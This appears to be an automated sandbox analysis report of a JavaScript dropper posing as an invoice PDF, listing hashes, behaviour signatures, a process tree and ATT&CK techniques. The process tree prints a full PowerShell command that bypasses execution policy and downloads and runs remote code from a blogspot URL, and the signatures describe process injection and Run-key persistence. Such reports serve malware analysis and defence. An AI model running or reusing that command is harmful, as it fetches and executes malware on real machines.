Analysis

  • max time kernel
    138s
  • max time network
    115s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-05-2024 06:21

General

  • Target

    lnvoice-1205700442.pdf (4).js

  • Size

    1.8MB

  • MD5

    fffee7bcbf8f724b68d02ebe0c5a133b

  • SHA1

    739696c36214a1a37f382b4da835ba44d2665027

  • SHA256

    b9b4fb770fdb055d474f1a54886bdc380c22afa777a3a0aeaf42a04dcb6a56a8

  • SHA512

    3f2bd2aa6b5cb22aa0c2042fa3af032c83b55f7e5407344cdb502abaf33b3e42d2e0073540226e6a8f3e09f3495ddbc339bfa29a38e420f11583632aa55fe8f4

  • SSDEEP

    768:cNWDuYelMVBbnPOgADSb8O/b64/jWsYOS+Hu8N0RNta7SuHiHwdcU6AH6xgO:JewBbnPOgnh/6OSAuNA6H9AH83

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Obfuscated with Agile.Net obfuscator 1 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Windows directory 1 IoCs
  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 12 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe "C:\Users\Admin\AppData\Local\Temp\lnvoice-1205700442.pdf (4).js"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4140
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -c [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;$(irm mainhotel5may.blogspot.com//////////////////////hehehehe) | . iex;Start-Sleep -Seconds 3;
      2⤵
      • Blocklisted process makes network request
      • Adds Run key to start application
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:928
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:3752
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2068
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 780
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:3960
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2424
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 784
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:4504
      • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2248
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 780
          4⤵
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:1000
      • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1584
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
          dw20.exe -x -s 784
          4⤵
          • Drops file in Windows directory
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious use of AdjustPrivilegeToken
          PID:3488

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

JavaScript

1
T1059.007

Persistence

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

1
T1547

Registry Run Keys / Startup Folder

1
T1547.001

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

3
T1012

System Information Discovery

4
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Microsoft\Windows\WER\Temp\WER61B8.tmp.xml
    Filesize

    4KB

    MD5

    7977840a013180f8d13f7848bd7f30da

    SHA1

    90ae7f466a9dd562587fd3e12082095cd149e277

    SHA256

    92f383524bcedb1f6dfb9dbbd2f9c9a296d3578828c4fdc4deab3050641be32d

    SHA512

    4ac09d19650467ad2016d47d82fbf97e5c42a89b14829dfbc5c143779773e9f251c67c8ea1c9a4c070fe48981dc75c7e0b855708b23d3203a83bc279295fd262

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xmrsi10i.uph.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/928-22-0x0000000000400000-0x0000000000486000-memory.dmp
    Filesize

    536KB

  • memory/928-62-0x0000000007100000-0x000000000710A000-memory.dmp
    Filesize

    40KB

  • memory/928-61-0x0000000006FB0000-0x0000000007000000-memory.dmp
    Filesize

    320KB

  • memory/928-60-0x0000000006EB0000-0x0000000006F4C000-memory.dmp
    Filesize

    624KB

  • memory/928-59-0x00000000065E0000-0x00000000067A2000-memory.dmp
    Filesize

    1.8MB

  • memory/928-41-0x0000000005770000-0x0000000005802000-memory.dmp
    Filesize

    584KB

  • memory/928-37-0x0000000005D20000-0x00000000062C4000-memory.dmp
    Filesize

    5.6MB

  • memory/928-30-0x0000000005600000-0x0000000005666000-memory.dmp
    Filesize

    408KB

  • memory/1928-16-0x000001A5181B0000-0x000001A5181BE000-memory.dmp
    Filesize

    56KB

  • memory/1928-14-0x00007FF9FAF50000-0x00007FF9FBA11000-memory.dmp
    Filesize

    10.8MB

  • memory/1928-21-0x000001A57F580000-0x000001A57F588000-memory.dmp
    Filesize

    32KB

  • memory/1928-19-0x000001A57F560000-0x000001A57F568000-memory.dmp
    Filesize

    32KB

  • memory/1928-66-0x00007FF9FAF50000-0x00007FF9FBA11000-memory.dmp
    Filesize

    10.8MB

  • memory/1928-29-0x00007FF9FAF50000-0x00007FF9FBA11000-memory.dmp
    Filesize

    10.8MB

  • memory/1928-18-0x000001A57F530000-0x000001A57F53A000-memory.dmp
    Filesize

    40KB

  • memory/1928-17-0x000001A57F540000-0x000001A57F55A000-memory.dmp
    Filesize

    104KB

  • memory/1928-0-0x00007FF9FAF53000-0x00007FF9FAF55000-memory.dmp
    Filesize

    8KB

  • memory/1928-20-0x000001A57F570000-0x000001A57F578000-memory.dmp
    Filesize

    32KB

  • memory/1928-13-0x000001A580010000-0x000001A5801D2000-memory.dmp
    Filesize

    1.8MB

  • memory/1928-12-0x00007FF9FAF50000-0x00007FF9FBA11000-memory.dmp
    Filesize

    10.8MB

  • memory/1928-2-0x00007FF9FAF50000-0x00007FF9FBA11000-memory.dmp
    Filesize

    10.8MB

  • memory/1928-1-0x000001A57F7D0000-0x000001A57F7F2000-memory.dmp
    Filesize

    136KB

  • memory/1928-63-0x00007FF9FAF50000-0x00007FF9FBA11000-memory.dmp
    Filesize

    10.8MB

  • memory/1928-64-0x00007FF9FAF53000-0x00007FF9FAF55000-memory.dmp
    Filesize

    8KB

  • memory/1928-65-0x00007FF9FAF50000-0x00007FF9FBA11000-memory.dmp
    Filesize

    10.8MB

  • memory/3752-28-0x0000000000E00000-0x0000000000E86000-memory.dmp
    Filesize

    536KB